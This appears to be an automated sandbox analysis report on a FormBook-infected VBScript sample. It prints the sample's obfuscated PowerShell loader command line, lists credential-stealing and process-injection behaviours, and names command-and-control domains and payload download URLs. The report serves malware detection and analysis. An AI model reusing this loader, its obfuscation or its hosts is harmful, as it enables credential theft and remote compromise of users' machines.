Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "cls;write 'fantasibilledernes ansttelsesomraadets grammates methodizing skumredes synostose macrotone guls scyphiform245 nonconservation mirks171 bonaire vejrskifte tekstspalte forsorgshjemmets rhyton skoenne fullbacks solbadets afsnitsindrykningerne bordeauxvine tyngende sporingsstationens afnazificering fantasibilledernes ansttelsesomraadets grammates methodizing skumredes synostose macrotone guls scyphiform245 nonconservation mirks171 bonaire vejrskifte tekstspalte forsorgshjemmets rhyton skoenne fullbacks solbadets afsnitsindrykningerne bordeauxvine tyngende sporingsstationens afnazificering';if (${host}.currentculture) {$fortrd++;}function jimmis($poria){$jumpily=$poria.length-$fortrd;$anteopercle='substri';$anteopercle+='ng';for( $racialisation=4;$racialisation -lt $jumpily;$racialisation+=5){$fantasibilledernes+=$poria.$anteopercle.invoke( $racialisation, $fortrd);}$fantasibilledernes;}function fluorideringen($uncouthly){ . ($flanconnade) ($uncouthly);}$hoosegow=jimmis 'un.emsklvoflipz ,deir,prlspa lk,nnaalle/or,i5tilb. ,dn0bran sam,(undewcredijo.nnimprdudsno udlw horsbesl aldnbemytprim vas.1neig0 kem.irri0,lde;bl,t .onawre,aipaahn .on6 tre4wagg; arm bru.xk rs6nost4educ; wo. counrklorvb.ot:lysa1regn2fald1xmas. ans0 s.d)elek kroogustiemuhacrestk acoo s.j/came2 p,e0pa.r1sk m0skil0h al1radr0foot1vomi charftovaistikrleveeoverf frdogoloxbrss/unde1majo2 enn1okke.prdi0s,nn ';$neurocanal151=jimmis 'ulyduempessloweilsarq,nd- .laa priginteegleanfishtskin ';$skumredes=jimmis 'brochsp,ktbookt .onpfac,sstri:male/ afa/ carl disarafrrbiocrsvelyb,cof undr angapre,n ungkbree.stancmaybppal.a ,an/heren.bekeu,orgdiamuanoms m t8cons5eoga.s.udcidylshe,lv gra ';$minty=jimmis 'mero>jamr ';$flanconnade=jimmis ' m.lisidee sslx.ype ';$lansquenet='guls';$andejagterne = jimmis 'velkeslaucfl.nhnontohydr l.m%aadsapa.ap subpforsdca iaviv.tmiddap,la%semi\sikkc sidoe,tanrsknctoogordbyrspaddpersaco elohmm6 yd.mounu chedhydasforb am m&gall& st. singemoanct,reh truo ade forbt hyp ';fluorideringen (jimmis 'piep$.lyhgtreblac roantib arbakumeltest: f.lmw.ttykryso ,hapres.lobfuafumishoustswanilaarckons=e,te(havfclsevm litd sv. ok e/r ascmonc ,mmi$da,ea ke niri,dhoddeber j entaax igparatcodaeidenrunpen kiheu.ad)symp ');fluorideringen (jimmis 'bdep$mirkgwea.lpreco sexb uheaeighlvgel:denom unsegodit,ambh ageosk,ldre pi p.ezominirealn a,vgfrdi=anet$blomsbombkslanu re.mtakirna oedeted ratefrolsskri.jords regpevanl .ipiaerotbrne(he e$fornm resiove.nhvidtorobyko i)ba,a ');fluorideringen (jimmis ' er[deernblomek.sttnig,.revescohaeslumrsk.fvpro,ikni c ybetandpfrago ob idetan hu,tarr.mbogbagorengra.anonbghjste ungr raa]afgr:fors: suksunteedevocjantulighrvoksismletcol.ym.toppro rtahio.ourt aflo udvclynto n,tl til scin= bin dis,[br dn deved,litobtu.lubes kaesmugc resu sclrquediinfrtzardy hyapunprrlrdooscout craomalpcmi,io oscloplat ordyneappre aehaak] cuc:sh Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_00C8C9F6 AllocateAndInitializeSid,GetLastError,AllocateAndInitializeSid,GetLastError,GetLengthSid,GetProcessHeap,HeapAlloc,InitializeAcl,GetLastError,AddAccessAllowedAce,GetLastError,AddAccessAllowedAce,GetLastError,InitializeSecurityDescriptor,GetLastError,SetSecurityDescriptorDacl,GetLastError,AllocateAndInitializeSid,GetLastError,SetSecurityDescriptorOwner,GetLastError,SetSecurityDescriptorGroup,GetLastError,IsValidSecurityDescriptor,GetLastError,GetProcessHeap,HeapFree,FreeSid,FreeSid,FreeSid, 25_2_00C8C9F6
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_00C8C9F6 AllocateAndInitializeSid,GetLastError,AllocateAndInitializeSid,GetLastError,GetLengthSid,GetProcessHeap,HeapAlloc,InitializeAcl,GetLastError,AddAccessAllowedAce,GetLastError,AddAccessAllowedAce,GetLastError,InitializeSecurityDescriptor,GetLastError,SetSecurityDescriptorDacl,GetLastError,AllocateAndInitializeSid,GetLastError,SetSecurityDescriptorOwner,GetLastError,SetSecurityDescriptorGroup,GetLastError,IsValidSecurityDescriptor,GetLastError,GetProcessHeap,HeapFree,FreeSid,FreeSid,FreeSid, 25_2_00C8C9F6
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_00C928C5 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 25_2_00C928C5
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected FormBook
Source: Yara match File source: 00000014.00000002.1962937195.0000000000690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.2523572570.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.2527878142.00000000006D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.2528076589.0000000000700000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.1962975047.00000000006C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Searches for Windows Mail specific files
Source: C:\Windows\explorer.exe Directory queried: C:\Program Files (x86)\Windows Mail wab.exe Jump to behavior
Source: C:\Windows\explorer.exe Directory queried: C:\Program Files (x86)\Windows Mail wab.exe Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe File opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Windows\SysWOW64\raserver.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ Jump to behavior

Remote Access Functionality
barindex
Yara detected FormBook
Source: Yara match File source: 00000014.00000002.1962937195.0000000000690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.2523572570.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.2527878142.00000000006D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.2528076589.0000000000700000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.1962975047.00000000006C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1466597 Sample: birectangular.vbs Startdate: 03/07/2024 Architecture: WINDOWS Score: 100 61 www.yh-9.xyz 2->61 63 alignedinvestment.com 2->63 65 2 other IPs or domains 2->65 73 Snort IDS alert for network traffic 2->73 75 Found malware configuration 2->75 77 Malicious sample detected (through community Yara rule) 2->77 81 12 other signatures 2->81 13 wscript.exe 1 2->13         started        16 rundll32.exe 2->16         started        signatures3 79 Performs DNS queries to domains with low reputation 61->79 process4 signatures5 107 VBScript performs obfuscated calls to suspicious functions 13->107 109 Suspicious powershell command line found 13->109 111 Wscript starts Powershell (via cmd or directly) 13->111 113 4 other signatures 13->113 18 powershell.exe 14 19 13->18         started        22 WmiPrvSE.exe 13->22         started        process6 dnsIp7 67 larryfrank.cpa 178.128.157.150, 443, 49705, 49707 DIGITALOCEAN-ASNUS Netherlands 18->67 83 Suspicious powershell command line found 18->83 85 Obfuscated command line found 18->85 87 Very long command line found 18->87 89 Found suspicious powershell code related to unpacking or dynamic code loading 18->89 24 powershell.exe 17 18->24         started        27 conhost.exe 18->27         started        29 cmd.exe 1 18->29         started        signatures8 process9 signatures10 95 Writes to foreign memory regions 24->95 97 Found suspicious powershell code related to unpacking or dynamic code loading 24->97 31 wab.exe 6 24->31         started        34 cmd.exe 1 24->34         started        36 wab.exe 24->36         started        process11 signatures12 115 Modifies the context of a thread in another process (thread injection) 31->115 117 Maps a DLL or memory area into another process 31->117 119 Sample uses process hollowing technique 31->119 121 Queues an APC in another process (thread injection) 31->121 38 explorer.exe 45 9 31->38 injected process13 dnsIp14 69 alignedinvestment.com 46.23.69.44, 49708, 49709, 80 UK2NET-ASGB United Kingdom 38->69 91 System process connects to network (likely due to code injection or exploit) 38->91 93 Searches for Windows Mail specific files 38->93 42 raserver.exe 1 18 38->42         started        46 wab.exe 38->46         started        48 wab.exe 38->48         started        signatures15 process16 file17 57 C:\Users\user\AppData\...\834logrv.ini, data 42->57 dropped 59 C:\Users\user\AppData\...\834logri.ini, data 42->59 dropped 99 Detected FormBook malware 42->99 101 Tries to steal Mail credentials (via file / registry access) 42->101 103 Tries to harvest and steal browser information (history, passwords, etc) 42->103 105 6 other signatures 42->105 50 cmd.exe 2 42->50         started        53 firefox.exe 42->53         started        signatures18 process19 signatures20 71 Tries to harvest and steal browser information (history, passwords, etc) 50->71 55 conhost.exe 50->55         started        process21
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
46.23.69.44
 alignedinvestment.com United Kingdom
13213 UK2NET-ASGB true
178.128.157.150
 larryfrank.cpa Netherlands
14061 DIGITALOCEAN-ASNUS false

Contacted Domains

Name IP Active
larryfrank.cpa 178.128.157.150 true
alignedinvestment.com 46.23.69.44 true
www.yh-9.xyz unknown unknown
www.alignedinvestment.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://larryfrank.cpa/Negus85.csv false
  • Avira URL Cloud: safe
 unknown
http://www.alignedinvestment.com/dd01/ true
  • Avira URL Cloud: safe
 unknown
https://larryfrank.cpa/xdKCjAMEQDWiUiQMPQ170.bin false
  • Avira URL Cloud: safe
 unknown
www.x6hk8.com/dd01/ true
  • Avira URL Cloud: safe
 unknown
http://www.alignedinvestment.com/dd01/?1b=FvhX3tn&P6A=GEjLb1Tin6w6/oNmqjqy4o9Gpfy10o15axoqIuar18d6EkZQtcnwuCqOmYoZ7k0oS8ANw4sL8g== true
  • Avira URL Cloud: safe
 unknown